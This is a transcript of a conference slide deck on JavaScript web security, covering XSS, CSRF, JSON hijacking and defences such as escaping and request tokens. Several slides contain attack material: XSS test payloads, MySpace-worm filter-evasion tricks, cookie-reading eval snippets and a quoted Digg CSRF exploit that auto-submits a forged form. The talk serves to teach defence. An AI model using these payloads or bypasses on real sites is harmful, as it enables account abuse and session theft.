JavaScript Security
JavaScript, as it is today, is an insecure language. We need to understand its shortcomings to improve the security of our applications and protect our users.

Transcript

  • 1. JavaScript Security jason harwig
  • 2. "How dangerous could this silly little toy scripting language running inside a browser be?" Jeff Atwood codinghorror.com stackoverflow.com
  • 3. “JavaScript's biggest weakness is that it is not secure.” douglas crockford
  • 4. "... nine out of 10 websites still have serious vulnerabilities ... (XSS) as the top vulnerability class" WhiteHat Security Website Security Statistic Report
  • 5. OWASP Top 10 2007: 1. XSS 2. Injection Flaws 3. File Exec 4. Direct Object Reference 5. CSRF 6. Information Leakage 7. Broken Auth 8. Insecure Crypto 9. Insecure Communications 10. Failure to restrict URL access
  • 6. browser limitations
  • 7. javascript IO • Ajax • Image • iFrame • Source script • Bridge to flash, Java applets
  • 8. var xhr = new XMLHttpRequest(); xhr.open(...)
  • 9. NIC Server Google * get or post
  • 10. var image = new Image(); image.src = url; * can detect connection success failure
  • 11. NIC Server Google * get requests only | onload | onerror
  • 12. f = document.createElement('iframe'); f.src = url; document.body.appendChild(f); * only if same domain
  • 13. NIC Server Google * get requests only
  • 14. s = document.createElement('script'); s.type = 'text/javascript'; s.src= url; document.body.appendChild(s); * if JSON returned
  • 15. NIC Server Google * get requests only
  • 16. f = document.createElement('form'); f.method = 'post'; ... f.submit();
  • 17. NIC Server Google * get or post
  • 18. white hat • Mashup / Aggregate content • SSO Solutions • Protect users / application integrity
  • 19. black hat • XSS • CSRF • JSON hi-jacking • Cookie session hijacking • Internal network scanning • History checking
  • 20. cross-site scripting
  • 21. Browser IFrame same origin policy
  • 22. user input escape it!
  • 23. XSS Flavors • Type 0 - DOM • Type 1 - Non-Persistent • Type 2 - Persistent
  • 24. type 0 var p = location.href.params; document.body.innerHTML = p
  • 25. Type 1 Search: <script>alert('xss');</script>
  • 26. Type 2 Please enter username: <script>alert('xss');</script>
  • 27. <c:out value="${var}" escapeXml="true"/> Your Username: <script>alert('xss');</script>
  • 28. html filtering
  • 29. samy is my hero from http://fast.info/myspace/
  • 30. [chart: Friend Requests over time, y-axis 0 to 7,000, x-axis 12:34pm through 1:30pm the next day]
  • 31. tag/attribute whitelist <div style="background:url( 'javascript:alert('xss')' )">
  • 32. 'javascript' stripped <div style="background:url( 'java\nscript:alert('xss')' )">
  • 33. " stripped String.fromCharCode(34);
  • 34. innerHTML stripped eval('document.body.inne' + 'rHTML');
  • 35. onreadystatechange stripped eval('xmlhttp.onread' + 'ystatechange = callback');
  • 36. to be continued..
  • 37. alternatives to escaping?
  • 38. google caja / ADsafe
  • 39. attack vectors to prevent?
  • 40. code evaluation eval('alert(document.cookie)'); (new Function('alert(document.cookie)'))();
  • 41. code eval continued <iframe src="java&#65533;script:alert('xss')"> </iframe>
  • 42. polluting global objects try { throw EvilArrayFunction; } catch (Array) { }
  • 43. xss lessons • Escape XML
  • 44. cross site request forgery the new kid
  • 45. NIC Server Google
  • 46. Digg.com • “digg” a story while logged in • Cookie authentication • known url, parameters
  • 47. digg exploit code mf = window.frames["myframe"]; html = '<form name="diggform" action="http://digg.com/diginfull" method="post">'; html = html+'<input type="text" name="id" value="367034"/>'; html = html+'<input type="text" name="orderchange" value="2"/>'; html = html+'<input type="text" name="category" value="0"/>'; html = html+'<input type="text" name="page" value="0"/>'; html = html+'<input type="text" name="t" value="undefined"/>'; html = html+'<input type="text" name="row" value="1"/>'; html = html+'</form>'; mf.document.body.innerHTML = html; mf.document.diggform.submit(); from http://4diggers.blogspot.com/
  • 48. Fixes? • Referral checking? • quick cookie expiration? • post?
  • 49. solved session.setAttribute("token", token); <input type="hidden" value="${token}"/>
  • 50. double submit cookie
  • 51. digg link <a href="javascript:dig([num],[id],[digCheck])">digg it</a>
  • 52. digg submit js new Ajax.Request("/diginfull", { "method": "post", "parameters": "id=" + itemd + "&row=" + row + "&digcheck=" + digcheck + "&type=" + type + "&loc=" + pagetype });
  • 53. no diggcheck, no digg
  • 54. digg.com • Added random hash as post parameter • server verifies request
  • 55. myspace • used hash in post to add friends • XSS vulnerable so the hash could be retrieved
  • 56. HDIV • HTTP Data Integrity Validator
  • 57. rsnake joins twitter
  • 58. crossdomain.xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd"> <allow-access-from domain="*.twitter.com" /> <site-control permitted-cross-domain-policies="master-only"/> <allow-http-request-headers-from domain="*.twitter.com" headers="*" secure="true"/> </cross-domain-policy>
  • 59. http://www.yourminis.com/search_minis.aspx?q=XSS
  • 60. stealing your gmail contacts
  • 61. google contacts url contacts?out=js&callback=google
  • 62. responseText google ({ Success: true, Errors: [], Body: { Contacts: [ { id, email, etc. } ] } });
  • 63. google’s solution? • responseXml
  • 64. lessons • Protect high value forms • CANNOT be stopped if site is vulnerable to XSS
  • 65. json hijacking
  • 66. new Ajax.Request('secretStuff', { onSuccess: doWork }); // server responds with [ { sensitive_info: '...' }, { sensitive_info: '...' } ]
  • 67. So how do I do it? • Override Array • Source script
  • 68. demo
  • 69. solved /*-secure- [ { sensitive_info: '...' }, { sensitive_info: '...' } ] */
  • 70. “solved” continued • protect JSON services behind post
  • 71. lessons • Many experts recommend JSON services shouldn’t serve sensitive data • use secure comment • responseXml as alternative
  • 72. Session hijacking
  • 73. demo
  • 74. internal network penetration
  • 75. history hijack
  • 76. demo
  • 77. resources "Security Now! Podcast" twit.tv/sn; "Fortify" fortifysoftware.com/security-resources/; "WhiteHat Security" whitehatsec.com; "XSS Generator" ha.ckers.org/xss.html; "Jeremiah Grossman Blog" jeremiahgrossman.blogspot.com; "Samy is my Hero" fast.info/myspace; "Digg Hack" 4diggers.blogspot.com; "HDIV" hdiv.org
  • 78. twitter: jharwig jason.harwig@nearinfinity.com nearinfinity.com/blogs careers@nearinfinity.com